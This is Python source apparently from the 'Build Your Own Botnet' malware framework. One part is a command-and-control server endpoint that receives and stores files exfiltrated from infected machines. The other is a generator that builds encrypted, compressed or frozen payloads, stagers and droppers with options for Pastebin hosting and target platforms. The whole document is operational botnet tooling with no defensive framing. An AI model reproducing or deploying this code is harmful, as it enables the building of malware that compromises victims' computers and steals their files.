def file_add():
"""Upload new exfilrated file."""
b64_data = request.form.get('data')
filetype = request.form.get('type')
owner = request.form.get('owner')
module = request.form.get('module')
session = request.form.get('session')
filename = request.form.get('filename')
# decode any base64 values
try:
data = base64.b64decode(b64_data)
except:
if b64_data.startswith('_b64'):
data = base64.b64decode(b64_data[6:]).decode('ascii')
else:
print('/api/file/add error: invalid data ' + str(b64_data))
return
try:
session = base64.b64decode(session)
except:
try:
if session.startswith('_b64'):
session = base64.b64decode(session[6:]).decode('ascii')
except:
pass
# add . to file extension if necessary
if not filetype:
filetype = '.dat'
elif not filetype.startswith('.'):
filetype = '.' + filetype
# generate random filename if not specified
if not filename:
filename = generators.variable(length=3) + filetype
output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner,
'files', filename)
# add exfiltrated file to database
file_dao.add_user_file(owner, filename, session, module)
# save exfiltrated file to user directory
with open(output_path, 'wb') as fp:
fp.write(data)
return filename
def main(*args, **kwargs):
"""
Run the generator
"""
#util.display(globals()['__banner'], color=random.choice(list(filter(lambda x: bool(str.isupper(x) and 'BLACK' not in x), dir(colorama.Fore)))), style='normal')
if not kwargs:
parser = argparse.ArgumentParser(
prog='client.py', description="Generator (Build Your Own Botnet)")
parser.add_argument('modules',
metavar='module',
action='append',
nargs='*',
help='module(s) to remotely import at run-time')
parser.add_argument('--name', action='store', help='output file name')
parser.add_argument('--icon',
action='store',
help='icon image file name')
parser.add_argument(
'--pastebin',
action='store',
metavar='API',
help=
'upload the payload to Pastebin (instead of the C2 server hosting it)'
)
parser.add_argument(
'--encrypt',
action='store_true',
help=
'encrypt the payload with a random 128-bit key embedded in the payload\'s stager',
default=False)
parser.add_argument(
'--compress',
action='store_true',
help='zip-compress into a self-extracting python script',
default=False)
parser.add_argument(
'--freeze',
action='store_true',
help=
'compile client into a standalone executable for the current host platform',
default=False)
parser.add_argument(
'--gui',
action='store_true',
help=
'generate client controllable via web browser GUI at https://buildyourownbotnet.com',
default=False)
parser.add_argument(
'--owner',
action='store',
help=
'only allow the authenticated owner to interact with this client',
default=False)
parser.add_argument('--os',
action='store',
help='target operating system',
default='nix')
parser.add_argument('--architecture',
action='store',
help='target architecture',
default='')
parser.add_argument(
'-v',
'--version',
action='version',
version='0.5',
)
options = parser.parse_args()
else:
options = collections.namedtuple('Options', [
'host', 'port', 'modules', 'name', 'icon', 'pastebin', 'encrypt',
'compress', 'freeze', 'gui', 'owner', 'operating_system',
'architecture'
])(*args, **kwargs)
# hacky solution to make existing client generator script work with package structure for web app
os.chdir(ROOT)
key = base64.b64encode(os.urandom(16))
var = generators.variable(3)
modules = _modules(options, var=var, key=key)
imports = _imports(options, var=var, key=key, modules=modules)
hidden = _hidden(options,
var=var,
key=key,
modules=modules,
imports=imports)
payload = _payload(options,
var=var,
key=key,
modules=modules,
imports=imports,
hidden=hidden)
stager = _stager(options,
var=var,
key=key,
modules=modules,
imports=imports,
hidden=hidden,
url=payload)
dropper = _dropper(options,
var=var,
key=key,
modules=modules,
imports=imports,
hidden=hidden,
url=stager)
os.chdir('..')
return dropper